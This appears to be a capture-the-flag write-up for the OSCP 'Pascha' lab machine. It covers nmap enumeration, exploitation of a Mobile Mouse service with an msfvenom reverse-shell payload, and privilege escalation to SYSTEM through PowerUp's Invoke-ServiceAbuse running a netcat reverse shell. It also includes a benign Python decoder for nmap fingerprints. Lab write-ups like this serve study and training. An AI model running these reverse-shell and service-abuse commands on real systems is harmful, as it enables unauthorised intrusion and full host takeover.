Pascha
Challenge 6 - Pascha
Target
- name: pascha.oscp.exam
- ip: 192.168.143.155
I add 192.168.143.155 pascha.oscp.exam to /etc/hosts
External Enumeration
Ports
- Open ports:
PORT SERVICE VERSION
80/tcp http Microsoft IIS httpd 10.0
7680/tcp pando-pub
9099/tcp unknown
9999/tcp abyss
35913/tcp unknown
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ sudo nmap -sS -p- pascha.oscp.exam | tee nmap_ss.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 14:38 CET
Nmap scan report for pascha.oscp.exam (192.168.143.155)
Host is up (0.059s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
7680/tcp open pando-pub
9099/tcp open unknown
9999/tcp open abyss
35913/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 153.73 seconds
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ sudo nmap -sV -p80,7680,9099,9999,35913 pascha.oscp.exam | tee nmap_sv.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 14:43 CET
Nmap scan report for pascha.oscp.exam (192.168.143.155)
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
7680/tcp open pando-pub?
9099/tcp open unknown
9999/tcp open abyss?
35913/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/30%Time=674B168B%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,1A2,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo
SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\
SF:x20321\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewpo
SF:rt\"\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BO
SF:DY\x20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,s
SF:ans-serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"
SF:\x20>The\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x2
SF:0receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFourReque
SF:st,1A2,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Ser
SF:ver\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20321\r\n
SF:\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\x20co
SF:ntent=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x20BGCO
SF:LOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-serif;
SF:\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>The\x
SF:20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x20receive\x
SF:20your\x20request\.</p></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.10 seconds
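The fingerprint Nmap could not match can be decoded offline instead of probing the host again. The following Python is an added example, not part of the original writeup: it joins the SF: continuation lines, undoes Nmap's escaping and parses the captured HTTP response, so the banner can be checked against an asset inventory and a mismatch between Content-Length and the recorded byte count stands out. The sample input is the page's own first fingerprint, trimmed to its first probe.

```python
import re

# Fingerprint from the page's first "nmap -sV" run, trimmed to the GetRequest probe and closed with ');'.
FINGERPRINT = r"""SF-Port9099-TCP:V=7.94SVN%I=7%D=11/30%Time=674B168B%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,1A2,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo
SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\
SF:x20321\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewpo
SF:rt\"\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BO
SF:DY\x20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,s
SF:ans-serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"
SF:\x20>The\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x2
SF:0receive\x20your\x20request\.</p></BODY></HTML>\r\n");"""

# Each probe result has the form r(<probe name>,<hex byte count>,"<escaped bytes>").
PROBE_RE = re.compile(r'r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
ESCAPES = {'r': '\r', 'n': '\n', 't': '\t'}
ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{2}|.)')

def unescape(s):
    # \xHH -> that byte; \r \n \t -> control chars; any other \<c> (e.g. \. \" \\) -> c.
    def sub(m):
        e = m.group(1)
        return chr(int(e[1:], 16)) if len(e) == 3 else ESCAPES.get(e, e)
    return ESCAPE_RE.sub(sub, s)

def join_lines(text):
    # Strip the SF-PortNNN-PROTO: header and the SF: prefixes BEFORE unescaping:
    # Nmap wraps at a fixed width, so escapes like \x2 / 0 straddle line breaks.
    lines = text.strip().splitlines()
    m = re.match(r'SF-Port(\d+)-(\w+):', lines[0])
    joined = lines[0][m.end():] + ''.join(l[3:] for l in lines[1:] if l.startswith('SF:'))
    return int(m.group(1)), m.group(2), joined

def parse_http(raw):
    # Split a raw HTTP response into status code, header dict and body.
    head, _, body = raw.partition('\r\n\r\n')
    status, *hdrs = head.split('\r\n')
    headers = {k.strip(): v.strip() for k, _, v in (h.partition(':') for h in hdrs)}
    return {'status': status.split()[1], 'headers': headers, 'body': body}

def decode_fingerprint(text):
    port, proto, joined = join_lines(text)
    probes = []
    for name, hexlen, payload in PROBE_RE.findall(joined):
        raw = unescape(payload)
        info = parse_http(raw) if raw.startswith('HTTP/') else {'body': raw}
        # declared_len is the byte count Nmap recorded; compare it with what was decoded.
        info.update(probe=name, declared_len=int(hexlen, 16), actual_len=len(raw))
        probes.append(info)
    return {'port': port, 'proto': proto, 'probes': probes}
```

Calling decode_fingerprint(FINGERPRINT) yields the 418-byte response with Server "Mobile Mouse Server" and a 321-byte body that matches its Content-Length header.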
nmap Vuln
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ sudo nmap -sV -p80,7680,9099,9999,35913 --script="vuln" pascha.oscp.exam
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 15:36 CET
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for pascha.oscp.exam (192.168.143.155)
Host is up (0.068s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-wnr1000-creds: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
7680/tcp filtered pando-pub
9099/tcp open unknown
| fingerprint-strings:
| JavaRMI, NULL:
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
| Content-Type: text/html
| Content-Length: 321
| <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "OSCP" was able to receive your request.</p></BODY></HTML>
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
| Content-Type: text/html
| Content-Length: 321
| <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "OSCP" was able to receive your request.</p></BODY></HTML>
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
|_ Content-Type: te
9999/tcp open abyss?
35913/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/30%Time=674B2330%P=x86_64-pc-linux-gnu%
SF:r(NULL,1054,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x
SF:20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x2032
SF:1\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x2
SF:0BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-s
SF:erif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>
SF:The\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x20rece
SF:ive\x20your\x20request\.</p></BODY></HTML>\r\nHTTP/1\.0\x20200\x20OK\x2
SF:0\r\nServer:\x20Mobile\x20Mouse\x20Server\x20\r\nContent-Type:\x20text/
SF:html\x20\r\nContent-Length:\x20321\r\n\r\n<HTML><HEAD><TITLE>Success!</
SF:TITLE><meta\x20name=\"viewport\"\x20content=\"width=device-width,user-s
SF:calable=no\"\x20/></HEAD><BODY\x20BGCOLOR=#000000><br><br><p\x20style=\
SF:"font:12pt\x20arial,geneva,sans-serif;\x20text-align:center;\x20color:g
SF:reen;\x20font-weight:bold;\"\x20>The\x20server\x20running\x20on\x20\"OS
SF:CP\"\x20was\x20able\x20to\x20receive\x20your\x20request\.</p></BODY></H
SF:TML>\r\nHTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Ser
SF:ver\x20\r\nContent-Type:\x20te")%r(JavaRMI,10B5,"HTTP/1\.0\x20200\x20OK
SF:\x20\r\nServer:\x20Mobile\x20Mouse\x20Server\x20\r\nContent-Type:\x20te
SF:xt/html\x20\r\nContent-Length:\x20321\r\n\r\n<HTML><HEAD><TITLE>Success
SF:!</TITLE><meta\x20name=\"viewport\"\x20content=\"width=device-width,use
SF:r-scalable=no\"\x20/></HEAD><BODY\x20BGCOLOR=#000000><br><br><p\x20styl
SF:e=\"font:12pt\x20arial,geneva,sans-serif;\x20text-align:center;\x20colo
SF:r:green;\x20font-weight:bold;\"\x20>The\x20server\x20running\x20on\x20\
SF:"OSCP\"\x20was\x20able\x20to\x20receive\x20your\x20request\.</p></BODY>
SF:</HTML>\r\nHTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20
SF:Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20321\
SF:r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\x2
SF:0content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x20B
SF:GCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-ser
SF:if;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>Th
SF:e\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x20receiv
SF:e\x20your\x20request\.</p></BODY></HTML>\r\nHTTP/1\.0\x20200\x20OK\x20\
SF:r\nServer:\x20Mobile\x20Mouse\x20Server\x20\r\nContent-Type:\x20te");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 343.54 seconds
http
Port 80
- IIS server on port 80: http://pascha.oscp.exam/
Port 9099
- On port 9099: Mobile Mouse Server, per the Server header in the nmap fingerprint above
Exploit
Remote Code Execution (RCE)
To get onto the machine I used the exploit published by lof1sec on GitHub: https://github.com/lof1sec/mobile_mouse_rce/tree/main
The exploit expects a file to upload and execute. For this purpose I create the payload with msfvenom:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.211 LPORT=9999 -f exe -o reverse9999.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse9999.exe
I start a listener on port 9999:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
And a web server in the folder where I generated the payload:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
At this point I run the exploit:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ python3 cve.py --target pascha.oscp.exam --file reverse9999.exe --lhost 192.168.45.211
Executing The Command Shell...
Triggering the eXe!
l00kup your listener!
The payload is fetched from my machine:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.143.155 - - [30/Nov/2024 16:26:09] "GET /reverse9999.exe HTTP/1.1" 200 -
The reverse shell opens on port 9999:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
connect to [192.168.45.211] from (UNKNOWN) [192.168.143.155] 51010
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\Temp>whoami
whoami
oscp\tim
And finally I capture the local flag.txt:
Privilege Escalation
Internal Enumeration
- I check the user and privileges with whoami and whoami /priv
Bash
PS C:\windows\temp\wintools> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
- Using curl, I load winPEAS and PowerUp.ps1 onto the machine through a web server opened on my machine with
Post Exploitation
- I open PowerShell with powershell -ep bypass and import the PowerUp.ps1 module with Import-Module .\PowerUp.ps1
- I check which services are modifiable:
- I open a listener on my machine on port 4455
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
- I use Invoke-ServiceAbuse to run a reverse shell as SYSTEM:
Bash
PS C:\windows\temp\wintools> Invoke-ServiceAbuse -Name GPGOrchestrator -Command "C:\windows\temp\wintools\nc.exe 192.168.45.211 4455 -e cmd"
Invoke-ServiceAbuse -Name GPGOrchestrator -Command "C:\windows\temp\wintools\nc.exe 192.168.45.211 4455 -e cmd"
ServiceAbused Command
------------- -------
GPGOrchestrator C:\windows\temp\wintools\nc.exe 192.168.45.211 4455 -e cmd
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.211] from (UNKNOWN) [192.168.143.155] 59214
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system